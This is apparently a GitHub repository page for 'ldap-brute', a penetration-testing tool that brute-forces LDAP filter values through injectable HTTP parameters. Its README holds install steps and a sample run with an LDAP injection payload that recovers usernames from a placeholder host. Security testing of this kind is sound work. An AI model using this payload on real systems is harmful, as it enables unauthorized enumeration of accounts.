A semi fast tool to bruteforce values of LDAP injections over HTTP.
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
lib
wordlists
.gitignore
LICENSE
README.md
ldap_brute.py
requirements.txt
test_ldap.py

README.md

Ldap dumper is a semi-fast tool to bruteforce unescaped user-input concatenations to LDAP filters over HTTP parameters.

Installation.

git clone git@github.com:droope/ldap-brute.git
cd ldap-brute/
pip install -r requirements.txt

Sample run.

LMint-PC ldap-dumper # python ldap-dumper.py 'http://vulnerable/ldap/example2.php?name=%s)(cn=*))%%00&password=' 'AUTHENTICATED as'
INFO - Entering wildcard brute mode for URL 'http://vulnerable/ldap/example2.php?name=%s)(cn=*))%%00&password='.
INFO - Valid initial values found: ['a', 'h']
50...
100...
150...
200...
250...
300...
350...
400...
450...
Valid values found (2.918s total time, 468 total HTTP requests):

admin2
hacker

Usage.

Please call python ldap-brute.py --help for more information, including examples.

Contribute.

Feel free to submit pull requests. You can run the tests with

python -m unittest discover